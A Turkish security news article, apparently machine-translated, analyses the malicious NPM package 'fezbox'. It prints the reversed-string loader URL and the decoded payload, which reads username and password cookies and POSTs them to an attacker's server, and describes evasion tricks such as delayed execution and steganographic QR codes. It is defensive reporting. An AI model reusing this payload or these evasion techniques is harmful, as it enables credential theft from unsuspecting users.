Fezbox adlı yeni bir NPM paketi, soket tehdidi araştırma ekibi tarafından, gömülü bir QR kodu aracılığıyla tarayıcı çerezlerinden kullanıcı adını ve şifre kimlik bilgilerini sunan sofistike bir kötü amaçlı yazılım dağıtım mekanizması olarak ortaya çıkarıldı.
NPM takma adı Janedu altında yayınlandı (kayıt e -postası janedu0216@gmail[.]com), paket, Cloudinary’de barındırılan bir steganografik QR kod görüntüsü içine sessizce getirilir ve yürütürken, zararsız bir JavaScript/TypeScript yardımcı programı olarak maskelenir.
Yazma sırasında Fezbox NPM’de canlı olarak kalır. Socket, paketi kaldırması ve tehdit oyuncusunun hesabını askıya almak için NPM güvenlik ekibine dilekçe verdi.
Paket
Fezbox, basitleştirilmiş Çince’den çevrildikten sonra sadece ihtiyacınız olanı içe aktarabilmeniz için özellik modülleri tarafından düzenlenen ortak yardımcı işlevlerin bir JavaScript/TypeScript yardımcı programı kütüphanesi olduğunu bildiriyor.
ReadMe, TypeScript Türleri, Entegre Testler, Yüksek Performans ve QR kodlarını oluşturma ve ayrıştırma için bir “QR kod modülü” gibi özellikleri vurgular.
Bununla birlikte, hiçbir yerde, kütüphaneyi içe aktarmanın, uzak bir QR kodu görüntüsünde gizlenmiş kodu alan ve çalıştıran bir arka plan işlemini tetiklediği konusunda uyarmaz.
Soket AI tarayıcısı hemen Fezbox’ı bilinen kötü amaçlı yazılım olarak işaretler ve analizi, statik analiz araçlarını ve insan gözden geçirenleri geçecek şekilde tasarlanmış birden fazla gizleme katmanını ortaya çıkarır.
Muayene üzerine, Minifiye CommonJS dağıtım dosyası, kötü niyetli bir yükün yürütülmesini iki dakika geciktiren kendi kendine arama işlevinin yanında, AES şifre çözme işleminden çerez ve lokalstoraj yardımcılarına her şey-bir dizi hizmet ihracatı ortaya çıkarır.
Kod önce bir geliştirme bayrağını kontrol ederek ve 2/3 olasılık koruyucusu kullanarak bir üretim ortamında (geliştirme veya sanal sanal alan değil) çalışmasını sağlar.
120 saniye bekledikten sonra, QRCodeScriptLoader ve URL dizesi algılamanın kaçınması için tersine çevrilmiş bir QR kodu görüntüsünü alır:
javascript"gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yraniduolc.ser//:sptth"
.split("").reverse().join("")
Çevirildiğinde, bu aşağıdakilere karar verir:
texthttps://res.cloudinary.com/dhuenbqsq/image/upload/v1755767716/b52c81c176720f07f702218b1bdc7eff_h7f6pn.jpg
Yükleyici, QR kodunu görüntüden ayrıştırır ve gömülü JavaScript yükünü yürütür.
Gizlilik
Tehdit oyuncusu, kimlik bilgisi çalma davranışını gizlemek için üç ayrı gizleme katmanı uygular:
- Ters Dizeler: Anahtar dizeler – bulut URL’si ve “şifre” adı dahil olmak üzere,
"drowssap"– Basit statik taramaları engellemek için geriye doğru saklanır. - Steganografik QR kodu: Gerçek kötü amaçlı komut dosyası, güvenilir bir CDN’den teslim edilen standart görünümlü bir QR kod görüntüsünün içinde gizlenir.
- Minifiye ve kodlanmış yük: QR kodunun yükü ayrıca, Unicode kaçış dizileri ve satır içi dize birleştirme kullanarak çerez erişim işlevlerini ve ağ isteklerini kodlar.
Bozulduktan sonra yük şunları okur:
javascriptfunction getC(name) {
return document.cookie
.split("; ")
.find(row => row.startsWith(`${name}=`))
?.split("=")[1];
}
async function s() {
const username = getC("username");
const password = getC("password");
if (!username || !password) return;
await fetch("https://my-nest-app-production.up.railway.app/users", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ username, password })
});
}
s();
Bu komut dosyası, varsa kullanıcı adını ve şifre çerezlerini toplar ve HTTPS gönderisi aracılığıyla aktörün sunucusuna gönderir, sonra sessizce çıkar.
Görünüm ve öneriler
Modern web uygulamaları, bu özel saldırının gerçek dünya etkisini sınırlayarak düz metin şifrelerini nadiren çerezlerde saklar.
Bununla birlikte, bir steganografik QR kodunun yaratıcı kullanımı, tehdit aktörlerinin güvenlik araçlarını atlamak ve algılamadan kaçmak için sürekli olarak nasıl yenilik yapacağını vurgulamaktadır.
Geleneksel statik analiz, ters ve davranış temelli bağımlılık taraması ihtiyacını vurgulayarak tersine çevrilmiş dizeleri kaçırabilir veya QR kod modüllerini görmezden gelebilir.
Geliştiriciler ve güvenlik ekipleri aşağıdaki en iyi uygulamaları uygulamalıdır:
- Otomatik bağımlılık taraması: Şüpheli paketleri üretime girmeden önce yakalamak için soket GitHub uygulaması veya CLI gibi araçları CI/CD boru hatlarına entegre edin.
- Tarayıcı Uzatma Uyarıları: Bilinen kötü amaçlı yazılımları ve yükleme zamanında yazım yazım sinyallerini işaretleyen tarayıcı tabanlı tarayıcılar yükleyin.
- Sıfır Tutma Varsayımları: Tüm üçüncü taraf bağımlılıklarını, özellikle QR kodu ayrıştırıcıları gibi nadiren kullanılan modüllere sahip olana kadar doğrulanana kadar güvenilmez olarak değerlendirin.
- Çalışma Zamanı İzleme: İstemci tarafı kodunda olağandışı ağ isteklerini veya gecikmiş yürütme modellerini algılayabilen uç nokta korumasını dağıtın.
Kuruluşlar, statik kontrolleri, dinamik analizleri ve çalışma zamanı izlemesini birleştiren katmanlı bir güvenlik yaklaşımı benimseyerek, giderek daha sofistike tedarik zinciri saldırılarının önünde kalabilir ve kullanıcı kimlik bilgilerini gizli, gizlenmiş tehditlerden koruyabilir.
Anında güncellemeler almak ve GBH’yi Google’da tercih edilen bir kaynak olarak ayarlamak için bizi Google News, LinkedIn ve X’te takip edin.